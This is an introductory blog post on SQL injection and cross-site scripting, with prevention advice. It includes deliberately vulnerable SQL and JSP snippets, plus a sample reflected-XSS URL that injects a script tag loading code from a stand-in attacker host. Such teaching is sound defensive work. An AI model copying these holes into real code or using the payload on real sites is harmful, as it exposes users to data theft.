Talking about SQL injection and XSS attacks

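As a computer novice, I have always thought that hackers are awesome, so this is a simple look at the darker side of knowledge: information security.
The word for hacker is a transliteration of the English word "Hacker". There are many ways of attacking or breaking into computers, mainly divided into two types:
(1) Non-destructive attacks: generally intended to disrupt the operation of a system without stealing system data. They only make the server temporarily unable to provide service to the outside, usually by means of denial-of-service attacks or information bombs.
(2) Destructive attacks: aimed at intruding into other people's computer systems, stealing confidential system information, and destroying the target system's data.
Common attacks include DDoS, CSRF, DoS, etc. The usual methods are viruses, flooding, and system vulnerabilities.
Here are a few brief introductions.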

SQL injection

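A common injection attack: by inserting SQL commands into a web form submission, or into the query string of a domain name or page request, the attacker ultimately tricks the server into executing malicious SQL commands. Specifically, it exploits an existing application's ability to pass (malicious) SQL commands to the back-end database engine for execution. By entering (malicious) SQL statements into a web form, an attacker can obtain the database of a website that has a security vulnerability, instead of the SQL statements being executed as the designer intended.
The essential reason that SQL injection is possible is that code and data are not strictly isolated, so that when the data is read, it is mistakenly executed as part of the code.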
Here is a simple example:

// Deliberately vulnerable: user input is concatenated straight into the SQL text
var testCondition;
testCondition = Request.Form("testCondition");
var sql = "select * from TableA where id='" + testCondition + "'";

In the above example, if the ID entered by the user is just a number, there is of course no problem. But if other SQL statements are inserted into testCondition after a ";" separator, unexpected results appear, for example when drop, delete, etc. are entered. As another example, if you accidentally enter characters like "#--!#@" and then save, so that the database is updated, the part after where is commented out, and the executed statement becomes

update table set memo=""# --! #(@" where use_id=xxxxxxx;

As a result, the memo field of every record is updated, instead of your record alone.
Several other authors have written about this in detail; you can go and read them:
(1) The most detailed SQL injection tutorial-Yi Liwei
(2) SQL in the web complete article
(3) SQL injection attacks
(4) Break the website with sql injection
To practice, you can find a practice target site to try it on; writing a practice target site yourself is also a good choice.
SQL injection is very harmful. When designing a program, we can prevent it in the following ways.

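(1) Filter special characters in user input parameters to reduce the risk of SQL injection.
(2) Prohibit SQL statements built by string concatenation; strictly use parameter binding to pass in SQL parameters.
(3) Make proper use of the anti-injection mechanisms provided by the database access framework.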
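
Prevention measure (2) in practice, as an added example that is not from the original post: the same memo update built by string concatenation and by parameter binding, run against a constructed in-memory SQLite table. The table name notes, the function names and the sample input are assumptions made for illustration; the input uses SQLite's -- comment marker where the post's string uses the MySQL-style #.

```python
import sqlite3

def make_db():
    """Constructed sample data: an in-memory table with three users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notes (use_id INTEGER PRIMARY KEY, memo TEXT)")
    db.executemany("INSERT INTO notes VALUES (?, ?)",
                   [(1, "alice"), (2, "bob"), (3, "carol")])
    return db

def save_memo_concat(db, use_id, memo):
    """Builds the statement by string concatenation, as in the post's example."""
    sql = "UPDATE notes SET memo='" + memo + "' WHERE use_id=" + str(use_id)
    return db.execute(sql).rowcount      # number of rows modified

def save_memo_bound(db, use_id, memo):
    """Fixed SQL text; the input is passed separately as bound parameters."""
    sql = "UPDATE notes SET memo=? WHERE use_id=?"
    return db.execute(sql, (memo, use_id)).rowcount

def memos(db):
    """Return every memo value, ordered by use_id."""
    return [row[0] for row in db.execute("SELECT memo FROM notes ORDER BY use_id")]

# Constructed input: a stray quote followed by SQLite's comment marker "--".
STRAY_INPUT = "oops' --!#(@"

def demo():
    """Save the same input for user 1 through both code paths."""
    db = make_db()
    hit_concat = save_memo_concat(db, 1, STRAY_INPUT)
    after_concat = memos(db)
    db = make_db()
    hit_bound = save_memo_bound(db, 1, STRAY_INPUT)
    after_bound = memos(db)
    return hit_concat, after_concat, hit_bound, after_bound

if __name__ == "__main__":
    for item in demo():
        print(item)
```

With concatenation the stray quote ends the string and the comment marker removes the WHERE clause, so all three rows change. With binding only the one row changes and the input is stored literally.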

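XSS attack

XSS stands for cross-site scripting. To avoid confusion with the abbreviation for Cascading Style Sheets (CSS), cross-site scripting is abbreviated as XSS. XSS is a computer security vulnerability in web applications that allows malicious web users to inject code into pages served to other users. That is, the attacker uses technical means to insert a malicious script into the HTML page requested by a normal user, so that arbitrary scripts can be executed.
Classification of XSS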

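(1) Reflected XSS

The malicious code is not stored on the target website. The attack is carried out by luring the user into clicking a malicious link that points to the target website.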

(2) Stored XSS

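The malicious code is saved on the target website's server. This kind of attack is relatively stable and persistent. It is most commonly seen on social sites such as blogs and forums, but it also shows up in OA systems and CRM systems. For example, the customer complaint function of a CRM system has a stored XSS vulnerability: an attacker submits malicious code, and when the system administrator views the complaint, the malicious code executes and steals customer data while the administrator remains completely unaware. This is a typical stored XSS attack.

(3) DOM-based XSS

This is actually a special type of reflected XSS. It is a vulnerability based on the DOM (Document Object Model).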

For example, in the Weibo XSS worm attack around 2011, the attacker exploited a vulnerability in which Weibo's publishing function did not effectively filter action-data, and included a URL containing the attack script when publishing a Weibo post. When users visited the post, the malicious script was loaded, which made them automatically repost the same post from their own accounts. Through this viral spread, a large number of users were attacked.
Here is a simple example of a file that may result in reflected XSS:

<div>
<h3>反射型XSS实例</h3>
<br>用户:<%=request.getParameter("userName")%>
<br>系统错误信息:<%=request.getParameter("errorMessage")%>
</div>

The above code obtains the two parameters userName and errorMessage from the HTTP request and outputs them directly into the HTML for display. When a URL like the following is constructed, reflected XSS occurs, and the user's browser executes the script file.

http://xss.demo/self-xss.jsp?userName=666<script>alert("666")</script>&errorMessage=XSS实例<script src=http://hacker.demo/xss-script.js>

XSS attacks are prevented mainly by filtering and escaping user input data, such as using the jsoup framework to XSS-filter the user input string, or using HtmlUtils in the Spring framework to HTML-escape the user input string, etc.

Here are a few more detailed XSS attack blogs
(1) XSS attacks on web security
(2) XSS cross-site scripting attacks
(3) XSS defense methods
(4) Talking about the principle of XSS attacks
Time is passing by; next time, let's share a little about the third type of hacking: CSRF.

Origin blog.csdn.net/qq_41606378/article/details/88848792